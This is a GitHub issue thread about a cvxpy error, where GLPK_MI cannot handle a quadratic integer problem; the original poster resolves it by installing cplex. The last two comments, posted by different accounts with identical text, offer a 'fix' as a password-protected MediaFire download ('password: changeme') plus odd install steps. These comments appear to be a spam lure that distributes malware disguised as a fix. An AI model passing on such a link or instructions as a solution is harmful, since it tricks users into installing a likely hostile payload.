### ISSUE TITLE
 cvxpy.error.SolverError: Either candidate conic solvers (['GLPK_MI']) do not support the cones output by the problem (SOC, NonNeg), or there are not enough constraints in the problem.

### ISSUE THREAD

**Issue by onford** [planetlabs/maxrect#10]
Hi guys,
I encountered with some problem while using `cvxopt`，and it says "cvxpy.error.SolverError: Either candidate conic solvers (['GLPK_MI']) do not support the cones output by the problem (SOC, NonNeg), or there are not enough constraints in the problem". How can I solve this problem?
```python
import cvxpy as cp
import numpy as np
c1=np.array([1, 1, 3, 4, 2])
c2=np.array([-8, -2, -3, -1, -2])
a=np.array([ [1, 1, 1, 1, 1], [1, 2, 2, 1, 6], [2, 1, 6, 0, 0],
[0, 0, 1, 1, 5]])
b=np.array([400, 800, 200, 200])
x=cp.Variable(5,integer=True)
obj=cp.Minimize(c1*x**2+c2*x)
con=[0<=x, x<=99, a*x<=b]
prob= cp.Problem(obj, con)
prob.solve()
print("Optimized Value: ", prob.value)
print("Optimized Solution \n",x.value)
```
Python == 3.12.5
cvxpy == 1.1.13
numpy == 1.21.1

**Comment by onford** [comment]
I have solved my problem by installing a solver. See [this](
https://www.cvxpy.org/tutorial/solvers/index.html#choosing-a-solver).
```
pip install cplex
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
